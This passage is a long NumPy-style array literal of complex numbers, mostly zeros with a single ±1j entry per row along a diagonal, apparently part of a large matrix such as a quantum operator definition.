0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
